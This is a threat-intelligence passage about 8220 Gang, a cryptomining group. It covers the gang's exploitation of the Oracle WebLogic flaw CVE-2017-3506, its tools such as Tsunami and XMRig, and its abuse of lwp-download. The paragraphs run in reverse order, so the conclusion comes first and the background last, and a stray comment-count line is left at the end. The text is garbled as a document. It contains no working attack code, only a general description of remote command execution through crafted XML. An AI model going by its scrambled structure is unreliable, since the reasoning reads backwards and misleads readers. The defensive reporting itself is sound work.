Despite reusing old tools and C&C servers, the gang has started targeting Windows systems, and using new file and C&C servers to evade previous detections.
Considering the threat actor’s tendency to reuse tools for different campaigns and abuse legitimate tools as part of the arsenal, organizations’ security teams might be challenged to find other detection and blocking solutions to fend off attacks that abuse this utility.Ībuse of lwp-download might be expected in the short term for compromise and targeting of other platforms. Lwp-download is a Linux utility present in a number of platforms by default, and 8220 Gang making this a part of any malware routine can affect a number of services even if it were reused more than once. This allows attackers to gain unauthorised access to sensitive data or compromise the entire system. This vulnerability, with a CVSS score of 7.4, impacts the WLS Security Component of Oracle WebLogic, and when exploited can enable attackers to execute arbitrary commands through an HTTP request remotely with a specifically crafted XML document. This article explores a recent attack observed exploiting the Oracle WebLogic vulnerability CVE-2017-3506 captured by one of our honeypots. Looking at other researchers’ documentation on the gang’s recent activities, it appears as if the threat actor has been active in recent months. The group was documented to have used Tsunami malware, XMRIG cryptominer, masscan, and spirit, among other tools in their campaigns. Researchers have documented this group targeting Oracle WebLogic, Apache Log4j, Atlassian Confluence vulnerabilities, and misconfigured Docker containers to deploy cryptocurrency miners in both Linux and Microsoft Windows hosts. 8220 Gang (also known as “8220 Mining Group,” derived from their use of port 8220 for command and control or C&C communications exchange) has been active since 2017 and continues to scan for vulnerable applications in cloud and container environments.
0 kommentar(er)
